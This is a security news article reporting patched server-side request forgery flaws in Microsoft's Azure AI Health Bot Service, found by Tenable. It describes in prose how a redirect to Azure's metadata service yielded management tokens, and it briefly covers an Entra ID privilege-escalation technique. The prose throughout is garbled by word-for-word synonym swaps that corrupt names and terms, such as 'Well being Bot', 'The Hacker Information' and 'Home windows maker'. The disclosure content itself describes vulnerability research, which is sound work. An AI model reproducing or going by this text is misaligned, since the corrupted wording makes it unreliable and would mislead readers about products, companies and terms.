Cybersecurity researchers have found two safety flaws in Microsoft’s Azure Well being Bot Service that, if exploited, may allow a malicious actor to attain lateral motion inside buyer environments and entry delicate affected person information.
The vital points, now patched by Microsoft, may have allowed entry to cross-tenant assets throughout the service, Tenable mentioned in a brand new report shared with The Hacker Information.
The Azure AI Well being Bot Service is a cloud platform that permits builders in healthcare organizations to construct and deploy AI-powered digital well being assistants and create copilots to handle administrative workloads and interact with their sufferers.
This consists of bots created by insurance coverage service suppliers to permit clients to lookup the standing of a declare and ask questions on advantages and companies, in addition to bots managed by healthcare entities to assist sufferers discover applicable care or lookup close by docs.
Tenable’s analysis particularly focuses on one facet of the Azure AI Well being Bot Service referred to as Information Connections, which, because the title implies, presents a mechanism for integrating information from exterior sources, be it third events or the service suppliers’ personal API endpoints.
Whereas the function has built-in safeguards to forestall unauthorized entry to inner APIs, additional investigation discovered that these protections may very well be bypassed by issuing redirect responses (i.e., 301 or 302 standing codes) when configuring an information connection utilizing an exterior host below one’s management.
By establishing the host to reply to requests with a 301 redirect response destined for Azure’s metadata service (IMDS), Tenable mentioned it was potential to acquire a legitimate metadata response after which pay money for an entry token for administration.azure[.]com.
The token may then be used to checklist the subscriptions that it offers entry to by the use of a name to a Microsoft endpoint that, in flip, returns an inner subscription ID, which may finally be leveraged to checklist the accessible assets by calling one other API.
Individually, it was additionally found that one other endpoint associated to integrating methods that help the Quick Healthcare Interoperability Assets (FHIR) information trade format was prone to the identical assault as effectively.
Tenable mentioned it reported its findings to Microsoft in June and July 2024, following which the Home windows maker started rolling out fixes to all areas. There isn’t a proof that the difficulty was exploited within the wild.
“The vulnerabilities raise concerns about how chatbots can be exploited to reveal sensitive information,” Tenable mentioned in a press release. “In particular, the vulnerabilities involved a flaw in the underlying architecture of the chatbot service, highlighting the importance of traditional web app and cloud security in the age of AI chatbots.”
The disclosure comes days after Semperis detailed an assault approach referred to as UnOAuthorized that permits for privilege escalation utilizing Microsoft Entra ID (previously Azure Energetic Listing), together with the flexibility so as to add and take away customers from privileged roles. Microsoft has since plugged the safety gap.
“A threat actor could have used such access to perform privilege elevation to Global Administrator and install further means of persistence in a tenant,” safety researcher Eric Woodruff mentioned. “An attacker could also use this access to perform lateral movement into any system in Microsoft 365 or Azure, as well as any SaaS application connected to Entra ID.”
Replace
Microsoft is monitoring the vulnerability below the CVE identifier CVE-2024-38109 (CVSS rating: 9.1), describing it as a privilege escalation flaw impacting the Azure Well being Bot Service.
“An authenticated attacker can exploit a Server-Side Request Forgery (SSRF) vulnerability in Microsoft Azure Health Bot to elevate privileges over a network,” the corporate mentioned in an advisory launched on August 13, 2024.